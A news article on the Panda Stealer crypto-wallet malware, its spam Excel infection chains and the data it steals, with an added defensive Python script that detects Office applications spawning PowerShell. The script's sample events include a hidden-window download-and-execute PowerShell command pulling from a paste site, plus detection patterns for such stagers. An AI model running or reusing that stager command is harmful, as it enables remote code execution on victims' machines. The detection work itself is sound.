The cryptocurrency community has been alerted to a new piece of malware that has set its crosshairs on crypto wallets. It seems digital currency holders have one more thing to be wary of.
Trend Micro recently published a blog post revealing the threat. According to the post, the company detected this new "information stealer", dubbed "Panda Stealer", as early as April.
The malware is being delivered through spam email. If Trend Micro's telemetry is anything to go by, Germany, Australia, Japan, and the United States were the countries most heavily affected during what is described as a "spam wave."
Panda Stealer is also said to be a modified iteration of the Collector Stealer malware. This nasty bug uses a fileless approach to avoid detection while it spreads.
How it infects
The malware is deployed via spam emails posing as business quote requests, luring cryptocurrency holders into opening malicious Excel files. Trend Micro highlighted two "infection chains":
- An .XLSM attachment whose macros download a loader; the loader then downloads and executes the main stealer.
- An .XLS attachment containing an Excel formula that runs a PowerShell command to reach paste.ee, a Pastebin alternative, which in turn serves a second, encrypted PowerShell command.
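Both chains share one observable step on the endpoint: an Office application spawning a shell that fetches its next stage from the internet. The script below is an added example written for this article, not code from Trend Micro or from the malware itself. It runs a simple detection over constructed process-creation events (a hypothetical key=value log format, not real telemetry) and flags Excel spawning PowerShell with a paste-site URL, an encoded command, a download-and-execute primitive, or a hidden window. It generalizes slightly beyond the article: it also treats Word and PowerPoint as suspicious parents and other script hosts as suspicious children, and it adds pastebin.com to paste.ee as an assumed paste site.

```python
import re
from collections import namedtuple

# Constructed sample events (hypothetical format; not from the article or any
# real telemetry). Only the first two should be flagged.
SAMPLE_EVENTS = [
    'ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE '
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine=powershell -w hidden -c "iex (New-Object Net.WebClient)'
    '.DownloadString(\'https://paste.ee/r/example\')"',
    'ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE '
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine=powershell -enc SQBFAFgA',
    'ParentImage=C:\\Windows\\explorer.exe '
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine=powershell Get-ChildItem',
    'ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE '
    'Image=C:\\Windows\\System32\\notepad.exe '
    'CommandLine=notepad.exe',
]

# Parent process, child process and command line, in that order, per event.
EVENT_RE = re.compile(
    r"^ParentImage=(?P<parent>.*?) Image=(?P<image>.*?) CommandLine=(?P<cmd>.*)$"
)

# Office parents (the article mentions Excel; Word/PowerPoint are an assumed extension).
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Script hosts and shells that an Office document should never spawn.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# paste.ee is named in the article; pastebin.com is an assumption.
PASTE_SITES = ("paste.ee", "pastebin.com")

Finding = namedtuple("Finding", "parent image cmd reasons")


def basename(path):
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(line):
    """Return a Finding for an Office-spawned shell, or None if the event is benign."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    parent, image, cmd = basename(m["parent"]), basename(m["image"]), m["cmd"]
    if parent not in OFFICE_APPS or image not in SHELLS:
        return None
    low = cmd.lower()
    reasons = ["office_spawned_shell"]
    if any(site in low for site in PASTE_SITES):
        reasons.append("paste_site_url")
    # -e / -ec / -enc / -encodedcommand carry a base64 payload.
    if re.search(r"(^|\s)-(e|ec|enc|encodedcommand)\b", low):
        reasons.append("encoded_command")
    # Download-and-run primitives typical of a stager.
    if re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b", low):
        reasons.append("download_or_exec_primitive")
    if re.search(r"-w(indowstyle)?\s+hidden", low):
        reasons.append("hidden_window")
    return Finding(parent, image, cmd, reasons)


def scan(lines):
    """Run analyze() over every event and keep only the findings."""
    return [f for f in map(analyze, lines) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.parent} -> {f.image}: {', '.join(f.reasons)}")
```

The second sample is flagged only because Excel spawned PowerShell with an encoded command; that is deliberate, since the fileless stage the article describes leaves no file on disk to scan and the parent/child relationship is often the only durable signal.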
It’s also hungry for your other online details
According to PC Gamer, Panda Stealer, which uses a fileless approach to remain unnoticed, "also has a taste" for the victim's Discord, Steam, NordVPN, and even Telegram account details. More worrying still, it can take screenshots, raid a device's browser cookie jar, and pilfer passwords and card details.
Now that all of this has been laid out, be very careful surfing the interwebs, especially if you are in possession of that precious virtual money. Cyber crooks are on the lookout for that online gold.